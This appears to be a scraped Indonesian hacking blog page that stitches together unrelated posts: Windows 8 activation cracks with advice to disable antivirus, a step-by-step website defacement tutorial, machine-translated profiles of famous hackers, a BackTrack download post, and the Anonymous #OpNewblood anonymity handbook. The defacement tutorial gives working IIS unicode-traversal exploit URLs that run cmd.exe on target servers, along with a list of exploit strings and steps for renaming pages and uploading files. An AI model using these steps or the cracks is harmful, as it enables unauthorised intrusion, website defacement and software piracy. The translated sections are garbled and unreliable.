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Windows 8 Activation Crack (All Versions)

Windows 8 Activation Crack (All Versions)

Activator 1 : 

Windows 8 activated with 7TKKMSA server can be used genuinely for 180 days, allowing all personalization and full features, although its still an unknown if the system can pass the genuine Windows validation. After 180 days, the Windows 8 system will need to check against a KMS host to maintain the activated status. Without activation, Windows 8 runs in notification mode where notification watermark appears every 3 hours to remind user to activate the system, and with restricted functionality especially those that related to personalization.

Version History :

- Fixed the issue where it could not detect what server you picked
- Fixed the issue with the command popups
- Improved background activator
- More bug fixes

- Now fetches servers to files
- Server combobox now loads the servers downloaded rather than just the background activator using them
- Clears traces of KMS activation
- Fixed possible severe security issue, fixes that issue with popups.
- Now auto downloads reported working servers every hour and a half
- Added manual update server list
- Performance improvements
- Various bug fixes


Activator 2 :

Microsoft Windows 8 and Server 2012 KMS Activator 1.4
Run the application as administrator. 
This requires an internet connection for activation. 

Note : The above two activators are tested & they work perfectly on any Windows 8 version. You may use any one of them.They may be detected by antivirus as Trojan, so turn it of while using the activation cracks. 

RAR File
485 KB

Screenshots :

Activator 1

Activator 1

Activator 2

Deface NT Website

Deface NT Website

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah

ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :


Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:


Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini


URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :


Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :


Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..
Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :


5 Hacker Paling Hebat Di Dunia

5 Hacker Paling Hebat Di Dunia

1. Kevin Mitnick Kevin Mitnick

Kevin Mitnick
Mitnick mungkin identik dengan Hacker
. The Department of Justice still refers to him as "the most wanted computer criminal in United States history." Departemen Kehakiman masih merujuk kepadanya sebagai "komputer kriminal paling dicari dalam sejarah Amerika Serikat." His accomplishments were memorialized into two Hollywood movies: Takedown and Freedom Downtime. prestasi Nya dimonumenkan menjadi dua film Hollywood: Takedown dan "Freedom Downtime.

Mitnick got his start by exploiting the Los Angeles bus punch card system and getting free rides. Mitnick mendapat mulai nya dengan memanfaatkan Los Angeles bus sistem kartu punch dan mendapatkan rides gratis. Then similar to Steve Wozniak, of Apple, Mitnick tried Phone Phreaking. Lalu mirip dengan Steve Wozniak, Apple, Mitnick mencoba Telepon Phreaking. Mitnick was first convicted for hacking into the Digital Equipment Corporation's computer network and stealing software. Mitnick pertama kali dihukum-hack ke jaringan komputer Digital Equipment Corporation dan mencuri software.

Mitnick then embarked on a two and a half year coast to coast hacking spree. Mitnick kemudian memulai dua setengah tahun pantai ke pantai hacking foya. He has stated that he hacked into computers, scrambled phone networks, stole corporate secrets and hacked into the national defense warning system. Dia telah menyatakan bahwa ia meng-hack ke komputer, orak-arik jaringan telepon, mencuri rahasia perusahaan dan menyusup ke sistem peringatan pertahanan nasional. His fall came when he hacked into fellow computer expert and hacker Tsutomu Shimomura's home computer. jatuh Nya datang ketika ia menyusup ke ahli komputer dan komputer di rumah rekan-rekan hacker Tsutomu Shimomura's.

Mitnick is now a productive member of society. Mitnick sekarang menjadi anggota masyarakat yang produktif. After serving 5 years and 8 months in solitary confinement, he is now a computer security author, consultant and speaker. Setelah menjalani 5 tahun 8 bulan di pengasingan, ia sekarang menjadi keamanan komputer penulis, konsultan dan pembicara.

2. 2. Adrian Lamo Adrian Lamo

Adrian Lamo
Lamo hit major organizations hard, hacking into Microsoft and The New York Times. Lamo hit organisasi besar keras, hacking ke Microsoft dan The New York Times. Lamo would use Internet connections at coffee shops, Kinko's and libraries to achieve his feats earning him the nickname "The Homeless Hacker". Lamo akan menggunakan koneksi internet di warung kopi, Kinko dan perpustakaan untuk mencapai prestasi itu produktif dia julukan "The Homeless Hacker". Lamo frequently found security flaws and exploited them. Lamo sering ditemukan kelemahan keamanan dan dimanfaatkan mereka. He would often inform the companies of the flaw. Dia sering akan menginformasikan perusahaan dari cacat.
Lamo's hit list includes Yahoo!, Citigroup, Bank of America and Cingular. daftar sasaran Lamo ini meliputi Yahoo!, Citigroup, Bank of America dan Cingular. Of course White Hat Hackers do this legally because they are hired by the company to such, Lamo however was breaking the law. Tentu saja White Hat Hacker melakukan ini secara hukum karena mereka dipekerjakan oleh perusahaan untuk tersebut, namun Lamo adalah melanggar hukum.
Lamo's intrusion into The New York Times intranet placed him squarely into the eyes of the top cyber crime offenders. Lamo intrusi ke dalam The New York Times intranet menempatkannya tepat ke mata para pelaku kejahatan cyber atas. For this crime, Lamo was ordered to pay $65,000 in restitution. Untuk kejahatan ini, Lamo diperintahkan untuk membayar $ 65.000 pada restitusi. Additionally, he was sentenced to six months home confinement and 2 years probation. Selain itu, ia dijatuhi hukuman enam bulan kurungan rumah dan 2 tahun masa percobaan. Probation expired January of 2007. Percobaan berakhir Januari 2007. Lamo now is a notable public speaker and award winning journalist. Lamo sekarang menjadi pembicara publik terkemuka dan jurnalis berprestasi.

3. Jonathan James : Jonathan James:

Jonathan James
At 16 years old, James gained enormous notoriety when he was the first minor to be sent to prison for hacking. Pada 16 tahun, James menjadi terkenal besar ketika ia adalah yang pertama kecil untuk dikirim ke penjara untuk hacking. He later admitted that he was just having fun and looking around and enjoyed the challenge. Dia kemudian mengakui bahwa ia hanya bersenang-senang dan melihat sekeliling dan menikmati tantangan.
James hit high profile organizations including the Defense Threat Reduction Agency, which is an agency of the Department of the Defense. James hit organisasi profil tinggi termasuk Pertahanan Threat Reduction Agency, yang merupakan agen dari Departemen Pertahanan. With this hack he was able to capture usernames and passwords and view highly confidential emails. Dengan hack ia mampu menangkap username dan password dan melihat email sangat rahasia.
High on James list, James also hacked in NASA computers and stole software valued at over $1.7 million. Tinggi pada daftar James, James juga berhasil menjebol komputer NASA dan mencuri software dengan harga lebih dari $ 1,7 juta. The Justice Department was quoted as saying: "The software stolen by James supported the International Space Station's physical environment, including control of the temperature and humidity within the living space." Departemen Kehakiman dikutip mengatakan: "software yang dicuri James didukung lingkungan fisik Stasiun Luar Angkasa Internasional, termasuk pengaturan suhu dan kelembaban di dalam ruang hidup." Upon discovering this hack, NASA had to shut dow its entire computer system costing taxpayers $41,000. Setelah menemukan hack ini, NASA harus menutup dow komputer seluruh sistem pembayar pajak seharga $ 41.000. Today James aspires to start a computer security company. Saat ini James bercita-cita untuk memulai sebuah perusahaan keamanan komputer.

4. 4. Robert Tappan Morris : Robert Tappan Morris:

Robert Tappan Morris
Morris is the son of a former National Security Agency scientist named Robert Morris. Morris merupakan anak dari seorang ilmuwan mantan Security Badan bernama Robert Morris. Robert is the creator of the Morris worm. Robert adalah pencipta worm Morris. This worm was credited as the first computer worm spread through the Internet. Cacing ini dicatat sebagai komputer pertama worm menyebar melalui Internet. Because of his actions, he was the first person to be prosecuted under the 1986 Computer Fraud and Abuse Act. Karena tindakannya, ia adalah orang pertama yang dituntut di bawah 1986 Penipuan dan Penyalahgunaan Komputer Undang-Undang.
Morris created the worm while at Cornell as a student claiming that he intended to use the worm to see how large the Internet was at the time. Morris menciptakan cacing sementara pada Cornell sebagai mahasiswa menyatakan bahwa ia bermaksud untuk menggunakan cacing untuk melihat berapa besar Internet pada waktu itu. The worm, however, reproduced itself uncontrollably, shutting down many computers until they had completely malfunctioned. cacing, bagaimanapun, direproduksi sendiri tak terkendali, mematikan banyak komputer sampai mereka telah benar-benar berfungsi. Experts claim 6,000 machines were destroyed. Para ahli mengklaim 6.000 mesin hancur. Morris was ultimately sentenced to three years' probation, 400 hours of community service and assessed a $10,500 fine. Morris akhirnya dihukum percobaan tiga tahun, 400 jam pelayanan masyarakat dan dinilai denda $ 10.500.
Morris is now a tenured professor at the MIT Computer Science and Artificial Intelligence Laboratory. Morris sekarang menjadi profesor tetap di MIT Computer Science dan Kecerdasan Buatan Laboratorium. His focus is computer network architecture. Fokus Nya adalah arsitektur komputer jaringan.

5. 5. Kevin Poulsen : Kevin Poulsen:

Kevin Poulsen
Frequently referred to as Dark Dante, Poulsen gained national recognition for his hack into Los Angeles radio's KIIS-FM phone lines. Sering disebut sebagai Dark Dante, Poulsen mendapat pengakuan nasional untuk nya hack ke garis KIIS-FM Los Angeles radio telepon. These actions earned him a Porsche among many other items. Tindakan ini membuatnya mendapatkan sebuah mobil Porsche antara banyak item lain.
The FBI began to search for Poulson, when he hacked into the FBI database and federal computers for sensitive wiretap information. FBI mulai mencari Poulson, ketika ia menjebol database FBI dan komputer federal untuk informasi penyadapan. Poulsen's specialty was hacking into phone lines and he frequently took over all of a station's phone lines. khusus Poulsen adalah hacking ke saluran telepon dan ia sering mengambil alih semua lini telepon stasiun. Poulson also reactivated old Yellow Page escort telephone numbers for a partner who operated a virtual escort agency. Poulson juga diaktifkan kembali nomor lama mengawal telepon Yellow Page pasangan yang dioperasikan badan pendamping virtual. Poulson was featured on Unsolved Mysteries and then captured in a supermarket. Poulson adalah fitur pada Unsolved Mysteries dan kemudian ditangkap di pasar swalayan. He was assessed a sentence of five years. Dia dinilai hukuman lima tahun.
Since his time in prison, Poulsen has worked as a journalist and was promoted to senior editor for Wired News. Sejak saat di penjara, Poulsen bekerja sebagai seorang jurnalis dan dipromosikan menjadi editor senior Wired News. His most popular article details his work on identifying 744 sex offenders with Myspace profiles. Pasalnya rincian karyanya yang paling populer untuk mengidentifikasi 744 pelecehan seksual di profil Myspace.

BackTrack 5

BackTrack 5

BackTrack adalah software yang paling sering di gunakan oleh para hacker
Salah satu kegunaannya untuk hack website orang lain

Details :
Type : GNOME
Format File : VMWARE
32 Bit
Size : 1.53 GB
Download => Download Backtrack 5
Untuk Download dalam format .ISO dan BIT berbeda
Silahkan ke link ini => Backtrack 5 Menu Download

Anonymous Super Secret Security Handbook

Anonymous Super Secret Security Handbook

The #OpNewblood Super Secret Security Handbook
If you have not gone through the IRC chat client
setup for your operating system, we recommend
you go back and get started there.

Master Table of Contents
1) Preface
2) Setting up Tor
3) Firefox Recommended Add-Ons
4) Setting up i2p
4.1) Installation
4.2) Firefox Configuration
4.3) IRC Client Configuration
4.4) I2p IRC on Android via irssi connectbot
5) Advanced IRC
5.1) Commands
5.2) Browsing
6) Advanced Defense Techniques
7) Portable Solutions


Section 1: Preface
NOTE: If at any time you need help with any topic found in this guide, feel free to join us at http://goo.gl/8zxwO and you’ll be able to find someone to help you figure it out. It should be noted that this guide contains information that may be difficult to understand without an extensive technical and functional knowledge of information systems. While this guide does attempt to put it simply and in laymans terms, you the user are ultimatly responsible for the security of your own systems.

Section 2: Setting up Tor
Preface: Due to abuse in the past, users trying to connect to the AnonOps IRC servers using Tor will not be able to connect. This is nothing personal, there have just been problems with abuse of the program in the past on the IRC server. Therefore, we do not recommend using this for IRC connection, but merely as an easy to use tool for browsing the internet anonymously. Keep it in, for most users it’s a relatively slow connection.
Go download Tor here: https://www.torproject.org/dist/torbrowser/tor-browser-1.3.18_en-US.exe
After downloading Tor:
1) Run the .exe
2) Extract to your PC.
3) You will now have extracted TOR into the selected folder. You should have a button called “Start Tor” with an onion on it, click this to start (if you want you can make a shortcut by right-clicking create shortcut and drag it to your desktop, make sure the original stays in the same folder though).
4) You are good to go, if your ISP blocks connections to TOR and you need help setting up a bridge feel free to ask about it in the #OpNewblood channel, which again you can access through your web browser at this link: http://goo.gl/8zxwO
1) Download Tor here: https://www.torproject.org/dist/torbrowser/linux/tor-browser-gnu-linux-i686-1.1.4-dev-en-US.tar.gz
2) Extract to destination of your choice
3) You should now be able to just click your start tor button to start.
4) For additional ease of use, try Tor Button for Firefox.
5) Once again for help with making a bridge if your ISP blocks Tor please ask for help in #OpNewblood via your web browser here: http://goo.gl/8zxwO
Mac OS X:
1) Download Tor here: https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-
2) Mount the .dmg file and find it on your desktop
3) Move Vidalia to your applications folder
4) Download the Tor button for Firefox here: https://www.torproject.org/torbutton/index.html.en
5) Once you have both installed, run Vidalia and make sure it says “Connected to the Tor Network!” and then go to your Firefox browser and right click on the indicator in the bottom right and click “Toggle Tor Status”
6) Read more on operating Tor here: https://www.torproject.org/docs/tor-doc-osx.html.en
7) Once again for help with making a bridge if your ISP blocks Tor please ask in the #Opewblood channel via your web browser here: http://goo.gl/8zxwO
1) To check anytime if TOR is working, you can go here: https://check.torproject.org/ and it will tell you if your TOR is working.
2) Highly reccomended is the TOR button for firefox: https://addons.mozilla.org/en-us/firefox/addon/torbutton/ which will allow you to turn tor on/off as well see if it’s disabled in your browser.
Anonymous Browsing Using Tor Button for Firefox
Start by install Tor on your computer and configuring it to your liking. Then, download the Tor Button add-on for Firefox, and use the options to configure the add-on the way you want it. Then, press the “Tor Button” and go to a test website to ensure you’ve done it correctly. If the website returns properly anonymous results, then you’ve correctly set up Firefox for anonymous browsing through Tor. Also worth doing: hit Tools>Start Private Browsing whenever you are browsing with Tor. It stops logging your web history, caching files, passwords, cookies, and download history, so you don’t have to clear the history everytime you’re finished.
Troubleshooting: refer to www.torproject.org

Section 3: Firefox recommended Add-ons
Adblock Plus: This plugin blocks around 90% of internet services that attempt to track your web activity and then send you targetted ads. It’s crucial to use while browsing any aon websites or sites that have anon news articles, etc. http://goo.gl/fPmjm
NoScript: A very useful plugin that will disable javascript on sites to protect your privacy and stop malicious activity. Can set rules for individual sites or deny globally. http://noscript.net/
BetterPrivacy: This plugin is a tool to identify and remove cookies. It will also act as an “optout” from advertisement and other forms of web tracking. http://goo.gl/TL79Z
FoxyProxy: An Addon to the default way to handle connecting to proxies, the FoxyProxy addon will allow you to have easier access to enabling your proxy tunnels, also has advanced features, such as setting up a list of domains that you will always want to use a proxy to connect to, and to do so automatically, while still using another connection for non-listed sites. http://goo.gl/VRiHT
Ghostery: Another tool to help manage and mitigate tracking cookies, Ghostery features tools that will alert you when there are tracking cookies on the websites you visit. You can also view information about each tracker that is trying to harvest your browsing data, and even view the source code of said tracker and see exactly how the cookie is tracking you. Make sure you get Fanboy list and Easy list to stay updated (these can be selected during setup or in the options of the addon itself ) http://goo.gl/GoKQ1
Greasemonkey (GM): A great addon that allows you to edit the way websites show information to you, using bits of javascript code. This is more of an addon “engine” or development platform, allowing you to write and download scripts to do many different things using their addon. http://goo.gl/atGk7
HTTPS Everywhere: A Firefox extension produced as a collaboration between The Tor Project and the Electronic Frontier Foundation. It encrypts your communications with a number of major websites. http://goo.gl/fsKV

Section 4: Setting up i2p for IRC+Browsing
by cred
Section 4 table of contents:
4.1 Installation
a. Windows
b. Linux
4.2 Firefox Configuration
4.3 IRC Client Configuration
4.4 I2p IRC on Android via irssi connectbot
4.1a) I2p Installation: Windows
1) Download:
You can download the latest version of the i2p software here:
2) Installing:
In windows, the installation, as with any other windows software, is relatively
straightforward. Double click on i2pinstall_(version).exe that you downloaded from the above website and follow the instructions.
3) Launching the router:
After the install has completed, you can access your router console (control panel for i2p software, in the form of a website) even when you’re not actively using the i2p proxy by doubleclicking the “Start I2p” icon or by following For those not versed in how the internet works, is an IP address that always leads to Localhost, or webservices that are running on your machine. As long as you are connecting to that address, no other anonymizing software is needed, since you are only talking to your own machine.
4) Browsing I2p:
In order to access .i2p websites, or eepsites, you’ll have to set up i2p as a PROXY on your web browser of choice, instructions for this on Firefox are in section 4.2
4.1b) I2p Installation: Linux
1) Easy way: Ubuntu.

  • Open a Terminal and enter:
sudo apt-get install sun-java6-jdk
  • Get the latest install package (yes, the .exe file, don’t ask, it’s java.) from http://www.i2p2.de/download. In the terminal window, navigate to the folder where you downloaded the .exe file and enter:
    java -jar i2pinstall-*.exe
  • Follow the prompts
2) Other distributions:
Google instructions for installing the java JRE software on your distribution, typically it’s not much more difficult than with Ubuntu, but different distros have their own package management systems, and the commands might be slightly different.
Once Java is installed, it’s the same command as Ubuntu:
java -jar i2pinstall-*.exe
4.2) Firefox Configuration
1) Verify it’s running:
Once the i2p client is installed, you can verify it’s running an http:// tunnel by
going to Under the “I2p Client Tunnels” section, the first entry should be “I2p HTTP Proxy”. On the right, under the “Status” column, there are three little stars, one red, one yellow, and one green. If red is lit up, hit the “start” button to the right of it, If it’s yellow, you don’t have enough peer connectionsyet, and you should let it establish a presence on the network. Leave it alone and grab a sandwich, it should be ok in an hour or two.
2) Set up localhost as a proxy
Goto Edit>Preferences
Goto the Advanced section
Under Connections click the Settings button
Select “Manual Proxy Configuration”
Enter the following:
  • HTTP Proxy: Port: 8118
  • SSL Proxy: Port: 8118
  • SOCKS Host: Port: 9050
  • SOCKS V5 checked
  • No Proxy for:
4.3) Various IRC Client configuration
IRC Clients need no special setup or proxies. Just visit your and make sure IRC Proxy is running. If it is, justconnect to on port 6668 like it’s a normal IRC server. Your client will sendall data to the proxy that’s running on your machine on port 6668, which will then send it, via I2p, anonymously and securely to the i2p IRC servers. You may enter additional .i2p irc servers by clicking on IRC Proxy on the Tunnel manager page and pasting the addresses in the “Tunnel Destination” field (comma seperated).Take a look at this list of clients and choose the one that sounds right for you:
Windows: http://www.ircreviews.org/clients/platforms-windows.html
Linux: http://www.ircreviews.org/clients/platforms-unix-x.html
(This author is a proud owner of a Ubuntu box, chatting on Xchat)
4.4) Fun shit
1) If you have a Linux machine, you can connect to the i2p irc servers through your home computer from your Android phone from anywhere in the world.
  • openssh for Ubuntu: sudo apt-get install openssh-server
  • irssi for Ubuntu: sudo apt-get install irssi
2) open irssi connectbot on your android and enter [your linux username]@yourip:port
Now, since most people are behind a firewall, or a router, or something, there’s
probably some port forwarding you’re going to have to do, but for now, just connect to your own wireless router with your android’s wifi. It’s safer anyway.
3) First thing you want to do is login with your password (that’s why it’s better to do it locally before doing it over the web… Make sure you’ve got encryption on your wifi, by the way)
4) Once you have a command prompt on your android, hit the back button to get back to the host list, then the menu button, and tap “Manage Pubkeys” Hit the menu again, and select “generate”. Name your key, make it RSA and give it at least a 1024 bit hash, (I go to 2048, you can’t be too careful) No password, and hit “Generate”
5) Now it will have you fuck around with your touchpad to generate randomness, and create your pubkey. Once you’re back on the pubkey list with your new pubkey, longpress on it and select “Copy Public Key”
6) Now hit the back button and click your host connection in the host list, which will bring you back to your command prompt. Enter cat “(hit menu and select paste to paste your pubkey into these quotes)” >> .ssh/authorised.keys
7) Now enter exit which will take you back to your server list, and disconnect you. Tap your server to connect again, and this time, it should not ask you for a
password. This means you are connected using a shared 1024 bit (at least)
pubkey, which ain’t bad.
8) To connect from outside your home network, you need a few more things:
  • Your external IP address: http://www.whatismyip.com
  • Port forwarding to port 22 on your machine (if you have a router and multiple machines on your home network as most do) See step 9
9) Most routers are set up with a web interface for changing settings. If you have
wireless security enabled, then you or whoever set up your home network for you, have already accessed the web interface, and should have set up a password. You’ll need to log into that web interface, go to the section on port forwarding, and forward an available external port (22 will do) to port 22 on your machine’s local IP address (usually or something) for BOTH tcp and udp. This is as clear as I can make it without router specific instructions. (Talk to your router provider or local geek for help in this regard)
10) Now all you need to do is connect through irssi connectbot to (your
username)@(your external IP address):(port you set up to forward to ssh on your
11) Once you’re connected to a ssh server on your home computer (which by now
should be running i2p) you may launch irssi, a command line irc client, and connect to the i2p servers with irssi using:
/connect 6668
Questions? Comments? Concerns? Join into #OpNewblood via your web browser here: http://goo.gl/8zxwO or you can contact cred via i2pmail cred@mail.i2p or from the insecure web (securely) at http://privacybox.de/cred.msg (include return contact info, since it doesn’t store or transmit any identifying information)

Section 5: Advanced IRC Commands
5.1) Commands
1) /join
Self explanatory, this is used to join a channel, to join #opnewblood , you would type /join #opnewblod
2) /me
Not really as necessary, but used sometimes. for instance if you wanted to wave at someone, you would type /me waves it would appear as “anon waves”
3) /msg
if you want to have a conversation with a specific person outside of the channel the best thing to do is message them, just type /msg username message here. just make sure to use a space between their name and the message.
4) /query
Same thing as msg, except this will open up a new window for you to have a conversation with this person.
5) /nick
This command will change your nickname for instance if you wanted to be called gigapuddi you’d type /nick gigapuddi. Remember though if you do this you won’t be registered unless you re-register with nickserv (see the walkthrough to anon if you dont know what nickserv is, or want help with it)
6) /quit
This will let you quit.
7) /ignore
Trolls are plenty, and it’s best not to feed them, and just ignore them. To ignore someone type /ignore username
8) /whois
This will display information about the person you selected, such as their vhost, what channels they’re in ect. to find a whois just type /whois username
9) /away
To mark yourself away, you can use this, if you were persay making a sandwich, you could do /away making sammiches and people will know you’re making sandwiches.
10) /ping
This is to see the latency to the server, if you’re lagging this might give you more information, to ping a server just type /ping ipadresshere
11) /notify on/off
This will change if you get a notification (a beep sound) whenever someone types your name. to turn off /notify off to turn on do /notify on
12) /topic
If you want to see a topic in a certain channel just type /topic and it will read it out to you.
13) /list
Lists the channels that are available to you.
5.2) Browsing IRC
When you arrive on the IRC for the first time, you will be using an unregistered nickname. If you plan on becoming a regular user, it is vital to register your nick. This is important for several reasons:
  • It ensures that nobody can impersonate you.
  • It grants you various abilities which non registered users do not have
  • (Most importantly) It allows you to use a vhost – this hides your location and ISP information from other users.
To register your nickname, refer to the IRC guide for your operating system on the original #OpNewblood page.
When you connect to the server, type /msg nickserv IDENTIFY password
This will tell nickserv that you are the real owner of your nickname. If you do not do this, you will not have access to registered-only chans or your vhost. For safety reasons, it is recommended that you type the command in your status window so, in the event of an error on your part, you do not post your password to an entire channel.
If you plan to use more than one nickname, you can group them together. This has several uses, the main ones being to tell people where you are connecting from, or that you are away.
For example: a user called “JohnDoe” might be going out for a while but leaving his laptop on, in which case he could change his nick to JohnDoe|Away or JohnDoe|AFK to let other users know he was away. This is important so as, for example, people will know why you are not replying to messages. He might also use the nick JohnDoe|Mobile to let people know he is on a mobile client, and therefore cannot use certain functions such as possibly recieving PMs or visiting links people might send him.
To change your nick, type /nick newnick. However, when you do this, you will lose any access levels, vhost, and other settings associated with your nick.
To avoid this, when you choose your new nickname, switch to it using /nick, then type /msg nickserv GROUP nick password – where nick and password are your MAIN nick and its password. This ensures that these nicks will share passwords and settings.
Let’s face it, sometimes shit happens. Sometimes your internet connection will randomly decide to die on you. Sometimes your laptop’s battery might run out, sometimes your IRC client will crash, sometimes you might accidentally close a window. There are many reasons one might suddenly find themselves accidentally disconnected from the IRC.
